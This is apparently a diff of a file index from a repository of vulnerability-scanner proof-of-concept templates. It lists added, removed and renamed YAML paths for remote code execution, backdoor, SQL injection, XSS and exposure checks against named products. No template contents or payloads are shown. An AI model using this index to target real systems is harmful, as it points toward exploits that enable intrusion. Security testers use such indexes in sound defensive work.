./poc/other/sonicwall-sslvpn-shellshock-10391.yaml ./poc/other/sonicwall-sslvpn-shellshock-10392.yaml ./poc/other/sonicwall-sslvpn-shellshock-10393.yaml ./poc/other/sonicwall-sslvpn-shellshock-10394.yaml +./poc/other/sonicwall-sslvpn-shellshock-10395.yaml ./poc/other/sony-camera-backdoor.yaml ./poc/other/sony-liv.yaml ./poc/other/sophi-4afed2941162d2b455634089bfa7fe66.yaml @@ -76582,6 +76563,7 @@ ./poc/other/speedycache-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/speedycache-plugin.yaml ./poc/other/speedycache.yaml +./poc/other/sphinxonline-panel.yaml ./poc/other/spice-post-slider-347b7b133c5bc03f847b0cc6cd76824f.yaml ./poc/other/spice-post-slider.yaml ./poc/other/spice-software-157cf14a019f2f39567d396451ba436d.yaml @@ -76619,7 +76601,6 @@ ./poc/other/spideranalyse.yaml ./poc/other/spidercontrol-scada-server-info-10411.yaml ./poc/other/spidercontrol-scada-server-info-10412.yaml -./poc/other/spidercontrol-scada-server-info-10413.yaml ./poc/other/spidercontrol-scada-server-info.yaml ./poc/other/spiderfoot.yaml ./poc/other/spidermag-236bed5b5a49a6173251e991d6ca44d1.yaml @@ -76658,7 +76639,6 @@ ./poc/other/split-test-for-elementor-bde4325200fb2f444fb8a10edf1336f9.yaml ./poc/other/split-test-for-elementor.yaml ./poc/other/splunk-enterprise-panel-10414.yaml -./poc/other/splunk-enterprise-panel-10415.yaml ./poc/other/splunk-enterprise-panel.yaml ./poc/other/splunk-workflow.yaml ./poc/other/splunk.yaml @@ -76669,7 +76649,7 @@ ./poc/other/sponsors-carousel-41040133b76cc5bfa7e90c541b024423.yaml ./poc/other/sponsors-carousel.yaml ./poc/other/spoofable-mail-missingdmarc.yaml -./poc/other/spoofable-spf-records-ptr-10425.yaml +./poc/other/spoofable-spf-records-ptr-10424.yaml ./poc/other/spoofable-spf-records-ptr-10426.yaml ./poc/other/spoofable-spf-records-ptr-10427.yaml ./poc/other/sportspress-ae19df4693862355cf869714c073d0eb.yaml @@ -77210,12 +77190,10 @@ ./poc/other/supermap-iserver.yaml ./poc/other/supermicro-bmc-panel-old.yaml ./poc/other/supermicro-bmc-panel.yaml -./poc/other/supershell-c2.yaml ./poc/other/superv-meeting.yaml ./poc/other/supervisord.yaml ./poc/other/supervpn-panel-10575.yaml ./poc/other/supervpn-panel-10576.yaml -./poc/other/supervpn-panel-10577.yaml ./poc/other/supervpn-panel.yaml ./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml ./poc/other/support-genix-lite.yaml @@ -77383,7 +77361,7 @@ ./poc/other/symantec-messaging-gateway-10607.yaml ./poc/other/symantec-messaging-gateway-10608.yaml ./poc/other/symantec-messaging-gateway-10609.yaml -./poc/other/symantec-messaging-gateway-10610.yaml +./poc/other/symantec-pgp-global-directory-10611.yaml ./poc/other/symantec-pgp-global-directory-10612.yaml ./poc/other/symantec-pgp-global-directory-10613.yaml ./poc/other/symantec-pgp-global-directory.yaml @@ -77426,7 +77404,6 @@ ./poc/other/synology-diskstation-nas.yaml ./poc/other/synology-photo-station.yaml ./poc/other/synology-router-manager.yaml -./poc/other/synopsys-coverity-panel.yaml ./poc/other/syntax-checking-10633.yaml ./poc/other/syntax-checking-10634.yaml ./poc/other/syntax-checking.yaml @@ -77484,6 +77461,7 @@ ./poc/other/tablesome-dc53a007f160e75fd224d604cb3a0711.yaml ./poc/other/tablesome.yaml ./poc/other/tabnabbing-check-10645.yaml +./poc/other/tabnabbing-check-10646.yaml ./poc/other/tabnabbing-check.yaml ./poc/other/taboola-5cde13fe6662d7d9b24cd4265d596789.yaml ./poc/other/taboola.yaml @@ -77606,8 +77584,9 @@ ./poc/other/team-showcase-supreme.yaml ./poc/other/team-showcase.yaml ./poc/other/team.yaml -./poc/other/teamcity-registration-enabled-10667.yaml +./poc/other/teamcity-registration-enabled.yaml ./poc/other/teamdoc-filesystem.yaml +./poc/other/teamforge-panel.yaml ./poc/other/teampass-panel.yaml ./poc/other/teamviewer-phish.yaml ./poc/other/teamviewer.yaml @@ -77627,6 +77606,7 @@ ./poc/other/tectuus-scada-monitor-10682.yaml ./poc/other/tectuus-scada-monitor.yaml ./poc/other/tekon-info-leak-10684.yaml +./poc/other/tekon-info-leak-10685.yaml ./poc/other/tekton-dashboard.yaml ./poc/other/telefication-1c7925e1a8107c9a8d402138b26021c6.yaml ./poc/other/telefication.yaml @@ -77701,13 +77681,12 @@ ./poc/other/teradici-pcoip-10704.yaml ./poc/other/teradici-pcoip-panel.yaml ./poc/other/teradici-pcoip-zero-client.yaml -./poc/other/teradici-pcoip.yaml ./poc/other/terillion-reviews-b491b4d5351fea9f098fb4edcecd04c9.yaml ./poc/other/terillion-reviews.yaml ./poc/other/terminal-feature-collection-and-control-system.yaml ./poc/other/terraclassifieds-535145ab999d35b4feced2028968ea53.yaml ./poc/other/terraclassifieds.yaml -./poc/other/terraform-enterprise-panel-10710.yaml +./poc/other/terraform-enterprise-panel-10711.yaml ./poc/other/terraform-enterprise-panel-10712.yaml ./poc/other/terraform-enterprise-panel.yaml ./poc/other/terramaster-workflow.yaml @@ -78038,15 +78017,14 @@ ./poc/other/thinkadmin-workflow.yaml ./poc/other/thinkadmin.yaml ./poc/other/thinkcmf-arbitary.yaml -./poc/other/thinkcmf-arbitrary-code-execution-10715.yaml ./poc/other/thinkcmf-arbitrary-code-execution-10716.yaml +./poc/other/thinkcmf-arbitrary-code-execution.yaml ./poc/other/thinkcmf-file-include.yaml ./poc/other/thinkcmf-workflow-10730.yaml ./poc/other/thinkcmf-workflow-10731.yaml ./poc/other/thinkcmf-write-shell.yaml ./poc/other/thinkcmf-write-shell.yml ./poc/other/thinkcmf.yaml -./poc/other/thinkcmf_include.yaml ./poc/other/thinker-intelligentgateway.yaml ./poc/other/thinkmail.yaml ./poc/other/thinkox.yaml @@ -78129,6 +78107,7 @@ ./poc/other/tianqing-info-leak.yaml ./poc/other/tianqing-info-leak.yml ./poc/other/tianyang-bpm-system.yaml +./poc/other/tibco-spotfire-panel.yaml ./poc/other/ticker-ultimate-7851c267c5129958224bd7b0d064e1e0.yaml ./poc/other/ticker-ultimate.yaml ./poc/other/tickera-event-ticketing-system-0e2339661545e817b8840235d57493ae.yaml @@ -78159,6 +78138,7 @@ ./poc/other/tiempocom.yaml ./poc/other/tier-pricing-table-2eb2ad93209e7797221e4672f0518887.yaml ./poc/other/tier-pricing-table.yaml +./poc/other/tigase-xmpp-server.yaml ./poc/other/tiger-form-a9c7778b2c1fe12201c4414e46e5cfe7.yaml ./poc/other/tiger-form.yaml ./poc/other/tiger-ip-connect.yaml @@ -78171,6 +78151,7 @@ ./poc/other/tileserver-gl-10785.yaml ./poc/other/tileserver-gl-10786.yaml ./poc/other/tileserver-gl-10787.yaml +./poc/other/tileserver-gl.yaml ./poc/other/timber-library-63f508e564b8a4abe97afab9c4153993.yaml ./poc/other/timber-library.yaml ./poc/other/time-sheets-01c399115e5a14d0d02b21cc32dc4267.yaml @@ -78356,7 +78337,6 @@ ./poc/other/topsec-vpn.yaml ./poc/other/topwalk-mtp.yaml ./poc/other/tor-socks-proxy-10810.yaml -./poc/other/tor-socks-proxy-10811.yaml ./poc/other/tor-socks-proxy-10812.yaml ./poc/other/tor-socks-proxy-10813.yaml ./poc/other/tor-socks-proxy.yaml @@ -78447,8 +78427,8 @@ ./poc/other/tradetracker-store.yaml ./poc/other/trading212-phish.yaml ./poc/other/tradingeye.yaml -./poc/other/traefik-dashboard-10832.yaml ./poc/other/traefik-dashboard-10833.yaml +./poc/other/traefik-dashboard-10834.yaml ./poc/other/traefik-dashboard.yaml ./poc/other/traefik-workflow.yaml ./poc/other/traefik.yaml @@ -78622,9 +78602,9 @@ ./poc/other/tutor-pro.yaml ./poc/other/tutor.yaml ./poc/other/tutortrac.yaml +./poc/other/tuxedo-connected-controller-10852.yaml ./poc/other/tuxedo-connected-controller-10853.yaml ./poc/other/tuxedo-connected-controller-10854.yaml -./poc/other/tuxedo-connected-controller-10855.yaml ./poc/other/tuxedo-connected-controller.yaml ./poc/other/twchat-1e11041979895de79516b21f580cfdc5.yaml ./poc/other/twchat-66860598cfdc267acba6e015a017bc01.yaml @@ -79299,12 +79279,11 @@ ./poc/other/upfiv-complete-all-in-one-seo-wizard.yaml ./poc/other/upnp-device-10980.yaml ./poc/other/upnp-device-10981.yaml -./poc/other/upnp-device-10982.yaml ./poc/other/upnp-device.yaml ./poc/other/uportal.yaml ./poc/other/ups-status-1.yaml -./poc/other/ups-status-10983.yaml ./poc/other/ups-status-10984.yaml +./poc/other/ups-status-10985.yaml ./poc/other/ups-status-2.yaml ./poc/other/upscale-179320c05c6c92e9b26b9cab26bf1bc3.yaml ./poc/other/upscale-8525917b8f35bb4eaf3e210e14fd7fa5.yaml @@ -79719,7 +79698,6 @@ ./poc/other/verge3d.yaml ./poc/other/verification-code-for-comments-402d5d368961e0883801cefc4dd8562b.yaml ./poc/other/verification-code-for-comments.yaml -./poc/other/veriz0wn-osint.yaml ./poc/other/verizon-router-panel.yaml ./poc/other/vernemq-status-page.yaml ./poc/other/vernemq-status.yaml @@ -80086,8 +80064,7 @@ ./poc/other/void-elementor-whmcs-elements-15e54a1af569e89032ac0ee0b704f8b0.yaml ./poc/other/void-elementor-whmcs-elements.yaml ./poc/other/voipmonitor-panel.yaml -./poc/other/voipmonitor-workflow-11065.yaml -./poc/other/voipmonitor-workflow.yaml +./poc/other/voipmonitor-workflow-11064.yaml ./poc/other/vop.yaml ./poc/other/vos-vos2009.yaml ./poc/other/votecount-for-balatarin-c9ee335a6e160eeeadce2a3c276f2f36.yaml @@ -80235,7 +80212,7 @@ ./poc/other/walk-score.yaml ./poc/other/walker-core-c9d28ba9af7ff1cee52a47de51a62b8e.yaml ./poc/other/walker-core.yaml -./poc/other/wallix-accessmanager-panel-11094.yaml +./poc/other/wallix-accessmanager-panel-11095.yaml ./poc/other/wallix-accessmanager-panel.yaml ./poc/other/wallstreet-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/wallstreet-7cccc28e1315b459e8b12f665a5d26e3.yaml @@ -80325,7 +80302,7 @@ ./poc/other/wavetop-days.yaml ./poc/other/wayos-panel.yaml ./poc/other/wayos维盟ac集中管理系统.yaml -./poc/other/wazuh-panel-11113.yaml +./poc/other/wazuh-panel-11114.yaml ./poc/other/wazuh-panel.yaml ./poc/other/wbcom-designs-buddypress-ads-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/wbcom-designs-buddypress-ads-edc227605cbf113bcdfd09c53dfc5da4.yaml @@ -80699,7 +80676,7 @@ ./poc/other/winterlock.yaml ./poc/other/winters.yaml ./poc/other/wireless-access-point-controller.yaml -./poc/other/wireless-leakage(1).yaml +./poc/other/wireless-leakage.yaml ./poc/other/wise-361b4625da00651d196bf168b5902896.yaml ./poc/other/wise-9099a88f255af571eb05254581f8054d.yaml ./poc/other/wise-chat-8c10bb16c734c3ae0e0598296078da6b.yaml @@ -81370,6 +81347,7 @@ ./poc/other/wooyun-2015-093724.yaml ./poc/other/wooyun-2015-096676.yaml ./poc/other/wooyun-2015-097832.yaml +./poc/other/wooyun-2015-148227(1).yaml ./poc/other/wooyun-2015-148227-11224.yaml ./poc/other/wooyun-2015-148227-11225.yaml ./poc/other/wooyun-2015-148227-11226.yaml @@ -81472,7 +81450,7 @@ ./poc/other/workscout.yaml ./poc/other/workspace-one-uem-11391.yaml ./poc/other/workspace-one-uem-11392.yaml -./poc/other/workspace-one-uem-11393.yaml +./poc/other/workspace-one-uem-11394.yaml ./poc/other/workspace-one-uem.yaml ./poc/other/workspaceone-uem-dashboard-11390.yaml ./poc/other/workspaceone-uem-dashboard.yaml @@ -81511,7 +81489,6 @@ ./poc/other/wowza-streaming-engine-11396.yaml ./poc/other/wowza-streaming-engine-11397.yaml ./poc/other/wowza-streaming-engine-11398.yaml -./poc/other/wowza-streaming-engine-11399.yaml ./poc/other/wowza-streaming-engine.yaml ./poc/other/wowza-wowzastreamingengine.yaml ./poc/other/wr-age-verification-40b3c90da10d9246a3d45605cfab9759.yaml @@ -81562,14 +81539,13 @@ ./poc/other/wsm-downloader.yaml ./poc/other/wsncm-iot.yaml ./poc/other/wsncm-system.yaml -./poc/other/wso2-2019-0598-11635.yaml ./poc/other/wso2-2019-0598-11636.yaml ./poc/other/wso2-carbon-server.yaml -./poc/other/wso2-management-console-11644.yaml ./poc/other/wso2-management-console-11645.yaml ./poc/other/wso2-management-console-11646.yaml +./poc/other/wso2-management-console-11647.yaml ./poc/other/wso2-management-console.yaml -./poc/other/wso2mgmtconsole(1).yaml +./poc/other/wso2mgmtconsole.yaml ./poc/other/wstmart.yaml ./poc/other/wti-like-post-801384ebb6b98e29bbc3da65ee0914d2.yaml ./poc/other/wti-like-post-c854ddc867a3e00f9bba9d6f39d622e4.yaml @@ -81762,6 +81738,7 @@ ./poc/other/yarn-lock-11727.yaml ./poc/other/yarn-lock-11729.yaml ./poc/other/yarn-lock-11730.yaml +./poc/other/yarn-lock.yaml ./poc/other/yatra-cbaa3d03ba7367a64c11c6690f1f36b8.yaml ./poc/other/yatra.yaml ./poc/other/yatri-tools-45a4d9b5b716af9eb5f5cf5c683a0860.yaml @@ -81844,6 +81821,7 @@ ./poc/other/yml-for-yandex-market.yaml ./poc/other/yongyou-ELTextFile.yaml ./poc/other/yongyou-changjietong-EFI.yaml +./poc/other/yongyou-eltextfile.yaml ./poc/other/yongyou-fileRead.yaml ./poc/other/yonyou-chanjet-tplus-downloadproxy-filedownload.yaml ./poc/other/yonyou-chanjet-tplus-getdecallusers-infoleak.yaml @@ -81895,7 +81873,7 @@ ./poc/other/yop-poll-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/yop-poll-plugin.yaml ./poc/other/yop-poll.yaml -./poc/other/yopass-panel-11749.yaml +./poc/other/yopass-panel-11750.yaml ./poc/other/yopass-panel.yaml ./poc/other/yottabyte-rizhiyi.yaml ./poc/other/you-shang-3047371f5c7a9995238b090856ba5be3.yaml @@ -82115,8 +82093,9 @@ ./poc/other/zhiyuan-fileRead.yaml ./poc/other/zhiyuan-oa-info-leak-11797.yaml ./poc/other/zhiyuan-oa-info-leak-11798.yaml -./poc/other/zhiyuan-oa-info-leak-11800.yaml +./poc/other/zhiyuan-oa-info-leak-11799.yaml ./poc/other/zhongan-xdecision.yaml +./poc/other/zhongkewangwei-fileread.yaml ./poc/other/zhongshengsoft-crm.yaml ./poc/other/zhongtan-ndstart.yaml ./poc/other/zhongyou-system.yaml @@ -82246,6 +82225,7 @@ ./poc/other/zte-zxsec统一安全网关.yaml ./poc/other/zuitu.yaml ./poc/other/zuul-panel-11842.yaml +./poc/other/zuul-panel-11843.yaml ./poc/other/zuul-panel.yaml ./poc/other/zuul-panel.yml ./poc/other/zwave2mqtt-health-check.yaml @@ -82444,6 +82424,7 @@ ./poc/perl/perl-scanner.yaml ./poc/perl/perl-status-9485.yaml ./poc/perl/perl-status-9486.yaml +./poc/perl/perl-status-9487.yaml ./poc/perl/perl-status-page.yaml ./poc/perl/superlist-5da18e3bfe18177f7ef82fb6ae815fe6.yaml ./poc/perl/superlist-ca628bb2dee1036910f5dc781a4bf2d7.yaml @@ -82510,6 +82491,7 @@ ./poc/php/bohuangwanglong-cmd-php-rce.yaml ./poc/php/bsphp-nauthorized-access.yaml ./poc/php/btoptionscom-hbr_php-sqli.yaml +./poc/php/clockwork-php-page-1016.yaml ./poc/php/clockwork-php-page-1017.yaml ./poc/php/clockwork-php-page-1018.yaml ./poc/php/clockwork-php-page-1019.yaml @@ -82573,7 +82555,7 @@ ./poc/php/php-backup-files-7.yaml ./poc/php/php-backup-files-8.yaml ./poc/php/php-backup-files-9.yaml -./poc/php/php-backup-files-9497.yaml +./poc/php/php-backup-files-9498.yaml ./poc/php/php-backup-files.yaml ./poc/php/php-cgi-cve-2012-1823.yml ./poc/php/php-cloud.yaml @@ -82590,9 +82572,7 @@ ./poc/php/php-errors-9508.yaml ./poc/php/php-errors-9509.yaml ./poc/php/php-errors-9510.yaml -./poc/php/php-errors-9511.yaml ./poc/php/php-errors-9512.yaml -./poc/php/php-errors.yaml ./poc/php/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml ./poc/php/php-event-calendar-4c41621f6e7b56d3c4fdd926d807fd58.yaml ./poc/php/php-event-calendar-abf62654d5558f36cc7e98af2469b42e.yaml @@ -82620,9 +82600,9 @@ ./poc/php/php-proxy-detect-1.yaml ./poc/php/php-proxy-detect-2.yaml ./poc/php/php-proxy-detect-9544.yaml -./poc/php/php-proxy-detect.yaml ./poc/php/php-scanner-9546.yaml ./poc/php/php-scanner-9547.yaml +./poc/php/php-scanner.yaml ./poc/php/php-server-monitor.yaml ./poc/php/php-shell-0771e0dee276537bea17fe994946d6c2.yaml ./poc/php/php-shell-aa4a6da32c1b252d9d4bc241fb9c858f.yaml @@ -82650,11 +82630,10 @@ ./poc/php/php-warning-9562.yaml ./poc/php/php-warning-9563.yaml ./poc/php/php-warning.yaml -./poc/php/php-zerodium-backdoor-rce-9569.yaml ./poc/php/php-zerodium-backdoor-rce-9570.yaml ./poc/php/php-zerodium-backdoor-rce-9571.yaml +./poc/php/php-zerodium-backdoor-rce-9572.yaml ./poc/php/php-zerodium-backdoor-rce-9573.yaml -./poc/php/php-zerodium-backdoor-rce.yaml ./poc/php/php-zerodium-backdoor.yaml ./poc/php/php.yaml ./poc/php/php168cms.yaml @@ -82664,10 +82643,11 @@ ./poc/php/phpbb.yaml ./poc/php/phpcms-cve-2018-19127.yml ./poc/php/phpcms.yaml +./poc/php/phpcollab-detect-9499.yaml ./poc/php/phpcollab-detect-9500.yaml ./poc/php/phpcollab-detect.yaml ./poc/php/phpcollab-panel.yaml -./poc/php/phpcollab-workflow-9503.yaml +./poc/php/phpcollab-workflow-9502.yaml ./poc/php/phpcollab-workflow.yaml ./poc/php/phpcollab.yaml ./poc/php/phpdealerlocator.yaml @@ -82697,7 +82677,6 @@ ./poc/php/phpinfo-9517.yaml ./poc/php/phpinfo-9518.yaml ./poc/php/phpinfo-9519.yaml -./poc/php/phpinfo-9520.yaml ./poc/php/phpinfo-9521.yaml ./poc/php/phpinfo-9522.yaml ./poc/php/phpinfo-disclosure-env.yaml @@ -82707,6 +82686,7 @@ ./poc/php/phpinfo-wp.yaml ./poc/php/phpinfo.yaml ./poc/php/phpldap-admin.yaml +./poc/php/phpldapadmin-panel.yaml ./poc/php/phpldapadmin-xss.yaml ./poc/php/phpldapadmin.yaml ./poc/php/phplist-邮件系统.yaml @@ -82740,12 +82720,11 @@ ./poc/php/phpmyadmin-setup-11857.yaml ./poc/php/phpmyadmin-setup-9529.yaml ./poc/php/phpmyadmin-setup-9530.yaml -./poc/php/phpmyadmin-setup-9531.yaml +./poc/php/phpmyadmin-setup-9532.yaml ./poc/php/phpmyadmin-setup-9533.yaml ./poc/php/phpmyadmin-setup-deserialization.yaml ./poc/php/phpmyadmin-setup-deserialization.yml ./poc/php/phpmyadmin-setup.yaml -./poc/php/phpmyadmin-sql-9534.yaml ./poc/php/phpmyadmin-sql-9535.yaml ./poc/php/phpmyadmin-sql-9536.yaml ./poc/php/phpmyadmin-sql.php-server-1.yaml @@ -82792,11 +82771,11 @@ ./poc/php/phpsword-favicon-manager.yaml ./poc/php/phpsysinfo.yaml ./poc/php/phpunit-9555.yaml +./poc/php/phpunit-9556.yaml ./poc/php/phpunit-9557.yaml ./poc/php/phpunit-9558.yaml ./poc/php/phpunit-cve-2017-9841-rce.yml ./poc/php/phpunit-result-cache-exposure.yaml -./poc/php/phpunit.yaml ./poc/php/phpweb.yaml ./poc/php/phpwiki-lfi-9564.yaml ./poc/php/phpwiki-lfi-9565.yaml @@ -82840,18 +82819,17 @@ ./poc/php/symfony-phpinfo.yaml ./poc/php/thinkphp-2-rce-10738.yaml ./poc/php/thinkphp-2-rce-10739.yaml -./poc/php/thinkphp-2-rce-10740.yaml ./poc/php/thinkphp-2-rce-10741.yaml ./poc/php/thinkphp-30-rce.yaml ./poc/php/thinkphp-50-rce.yaml ./poc/php/thinkphp-501-rce-10742.yaml -./poc/php/thinkphp-501-rce-10743.yaml +./poc/php/thinkphp-501-rce.yaml ./poc/php/thinkphp-5010-rce.yaml ./poc/php/thinkphp-5022-5129-rce.yaml +./poc/php/thinkphp-5022-rce-10744.yaml ./poc/php/thinkphp-5022-rce-10745.yaml ./poc/php/thinkphp-5022-rce-10746.yaml -./poc/php/thinkphp-5022-rce.yaml -./poc/php/thinkphp-5023-rce-10748.yaml +./poc/php/thinkphp-5022-rce-10747.yaml ./poc/php/thinkphp-5023-rce-10749.yaml ./poc/php/thinkphp-5023-rce-10750.yaml ./poc/php/thinkphp-5023-rce-10751.yaml @@ -82859,7 +82837,6 @@ ./poc/php/thinkphp-509-information-disclosure-10752.yaml ./poc/php/thinkphp-509-information-disclosure-10753.yaml ./poc/php/thinkphp-509-information-disclosure-10754.yaml -./poc/php/thinkphp-509-information-disclosure-10755.yaml ./poc/php/thinkphp-509-information-disclosure.yaml ./poc/php/thinkphp-50x-arbitrary-file-read.yaml ./poc/php/thinkphp-controller-rce.yml @@ -82890,6 +82867,7 @@ ./poc/php/tongda-oa-v2017-video-file-php-filedownload.yaml ./poc/php/tongda-oa-wbupload-php-fileupload.yaml ./poc/php/tosec-jumpserver-admin-php-sqli.yaml +./poc/php/twig-php-ssti-10856.yaml ./poc/php/twig-php-ssti-10857.yaml ./poc/php/twig-php-ssti-10858.yaml ./poc/php/twig-php-ssti-10859.yaml @@ -82913,7 +82891,6 @@ ./poc/php/wp-livephp.yaml ./poc/php/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/php/wp-php-widget.yaml -./poc/php/wp-phpfreechat-xss-11524.yaml ./poc/php/wp-phpfreechat-xss-11526.yaml ./poc/php/wp-phpfreechat-xss-11527.yaml ./poc/php/wp-phpfreechat-xss-11528.yaml @@ -82942,13 +82919,14 @@ ./poc/python/Django-DebugMode.yaml ./poc/python/autobahn-python-detect-592.yaml ./poc/python/autobahn-python-detect-593.yaml -./poc/python/autobahn-python-detect-595.yaml +./poc/python/autobahn-python-detect-594.yaml ./poc/python/default-django-page-6840.yaml ./poc/python/default-django-page-6841.yaml ./poc/python/default-django-page-6842.yaml ./poc/python/default-django-page-6843.yaml ./poc/python/django-admin-panel-7021.yaml ./poc/python/django-admin-panel-7022.yaml +./poc/python/django-admin-panel-7023.yaml ./poc/python/django-admin-panel.yaml ./poc/python/django-debug-detect-7024.yaml ./poc/python/django-debug-detect-7025.yaml @@ -82956,6 +82934,7 @@ ./poc/python/django-debug-detect.yaml ./poc/python/django-debug-enable.yaml ./poc/python/django-debug-enabled.yaml +./poc/python/django-debug-exposed-404.yaml ./poc/python/django-debug-exposure-7028.yaml ./poc/python/django-debug-exposure-7029.yaml ./poc/python/django-debug-exposure-7030.yaml @@ -82969,15 +82948,13 @@ ./poc/python/django-directory-traversal.yaml ./poc/python/django-framework-exceptions-7033.yaml ./poc/python/django-framework-exceptions-7034.yaml -./poc/python/django-framework-exceptions.yaml ./poc/python/django-rest-framework.yaml -./poc/python/django-secret-key.yaml +./poc/python/django-secret.key.yaml ./poc/python/django-variables-exposed.yaml ./poc/python/django.yaml ./poc/python/djangodebug.yaml ./poc/python/flask-redis-docker.yaml ./poc/python/flask-werkzeug-debug.yaml -./poc/python/jupyter-ipython-unauth-8402.yaml ./poc/python/jupyter-ipython-unauth-8404.yaml ./poc/python/jupyter-ipython-unauth-8405.yaml ./poc/python/jupyter-ipython-unauth.yaml @@ -82985,16 +82962,15 @@ ./poc/python/python-metrics-9745.yaml ./poc/python/python-metrics-9746.yaml ./poc/python/python-metrics-9747.yaml -./poc/python/python-metrics.yaml ./poc/python/python-phish.yaml -./poc/python/python-scanner.yaml +./poc/python/python-scanner-9748.yaml ./poc/rabbitmq/rabbitmq-config-exposure.yml -./poc/rabbitmq/rabbitmq-dashboard-9776.yaml ./poc/rabbitmq/rabbitmq-dashboard-9777.yaml ./poc/rabbitmq/rabbitmq-dashboard-9778.yaml +./poc/rabbitmq/rabbitmq-dashboard-9779.yaml ./poc/rabbitmq/rabbitmq-dashboard.yaml +./poc/rabbitmq/rabbitmq-default-admin-9780.yaml ./poc/rabbitmq/rabbitmq-default-admin-9781.yaml -./poc/rabbitmq/rabbitmq-default-admin-9782.yaml ./poc/rabbitmq/rabbitmq-default-admin.yaml ./poc/rabbitmq/rabbitmq-default-login-9783.yaml ./poc/rabbitmq/rabbitmq-default-login-9784.yaml @@ -83012,6 +82988,7 @@ ./poc/redis/exposed-redis-7336.yaml ./poc/redis/exposed-redis-7337.yaml ./poc/redis/exposed-redis-7338.yaml +./poc/redis/exposed-redis-7339.yaml ./poc/redis/exposed-redis.yaml ./poc/redis/flask-redis-docker.yaml ./poc/redis/misconfigured-redis.yaml @@ -83218,18 +83195,17 @@ ./poc/remote_code_execution/apache-druid-kafka-connect-rce.yaml ./poc/remote_code_execution/apache-filename-brute-force-353.yaml ./poc/remote_code_execution/apache-filename-brute-force.yaml -./poc/remote_code_execution/apache-flink-unauth-rce-355.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-356.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-357.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-358.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-359.yaml ./poc/remote_code_execution/apache-flink-upload-rce.yml ./poc/remote_code_execution/apache-httpd-cve-2021-41773-rce.yml -./poc/remote_code_execution/apache-httpd-rce-362.yaml ./poc/remote_code_execution/apache-httpd-rce-363.yaml ./poc/remote_code_execution/apache-httpd-rce.yaml ./poc/remote_code_execution/apache-ofbiz-log4j-rce-366.yaml ./poc/remote_code_execution/apache-solr-91-rce.yaml +./poc/remote_code_execution/apache-solr-log4j-rce-372.yaml ./poc/remote_code_execution/apache-solr-log4j-rce.yaml ./poc/remote_code_execution/apache-solr-rce.yaml ./poc/remote_code_execution/apache-spark-rce.yaml @@ -83386,7 +83362,7 @@ ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-5989797b3de4a7d046b22faa41f147a5.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce.yaml -./poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml +./poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml ./poc/remote_code_execution/cisco-rv-series-rce.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-450f3fa1fdfaa0d436f04229a0397315.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83410,8 +83386,8 @@ ./poc/remote_code_execution/co2ok-for-woocommerce-plugin.yaml ./poc/remote_code_execution/co2ok-for-woocommerce.yaml ./poc/remote_code_execution/code42-log4j-rce-1130.yaml -./poc/remote_code_execution/code42-log4j-rce-1131.yaml ./poc/remote_code_execution/code42-log4j-rce-1132.yaml +./poc/remote_code_execution/code42-log4j-rce.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-0524990b8a93f2e726c050d49aa0b22e.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-3574e2251d76d53bdcc685462fdb0300.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83442,10 +83418,10 @@ ./poc/remote_code_execution/consul-rexec-rce.yml ./poc/remote_code_execution/consul-service-rce.yaml ./poc/remote_code_execution/consul-service-rce.yml -./poc/remote_code_execution/core-chuangtian-cloud-rce-1207.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1208.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1209.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1210.yaml +./poc/remote_code_execution/core-chuangtian-cloud-rce-1211.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1212.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce.yaml ./poc/remote_code_execution/cost-of-goods-for-woocommerce-29aeaa3c6bb2e136205e4a60d94d44f4.yaml @@ -83682,8 +83658,8 @@ ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic-plugin.yaml ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic.yaml -./poc/remote_code_execution/elex-woocommerce-xss-7199.yaml ./poc/remote_code_execution/elex-woocommerce-xss-7200.yaml +./poc/remote_code_execution/elex-woocommerce-xss.yaml ./poc/remote_code_execution/elfinder-rce.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce-2a0fbc617737467a0c1230deb2588849.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce.yaml @@ -83751,7 +83727,9 @@ ./poc/remote_code_execution/extra-product-options-for-woocommerce.yaml ./poc/remote_code_execution/eyou-email-rce-7378.yaml ./poc/remote_code_execution/eyou-email-rce-7379.yaml +./poc/remote_code_execution/eyou-email-rce-7380.yaml ./poc/remote_code_execution/eyou-email-rce-7381.yaml +./poc/remote_code_execution/eyou-email-rce-7382.yaml ./poc/remote_code_execution/eyou-email-rce.yaml ./poc/remote_code_execution/eyou-mail-moni-detail-rce.yaml ./poc/remote_code_execution/f5-tmui-cve-2020-5902-rce.yml @@ -83768,19 +83746,21 @@ ./poc/remote_code_execution/fastjson-1-2-24-rce-1.yaml ./poc/remote_code_execution/fastjson-1-2-24-rce-2.yaml 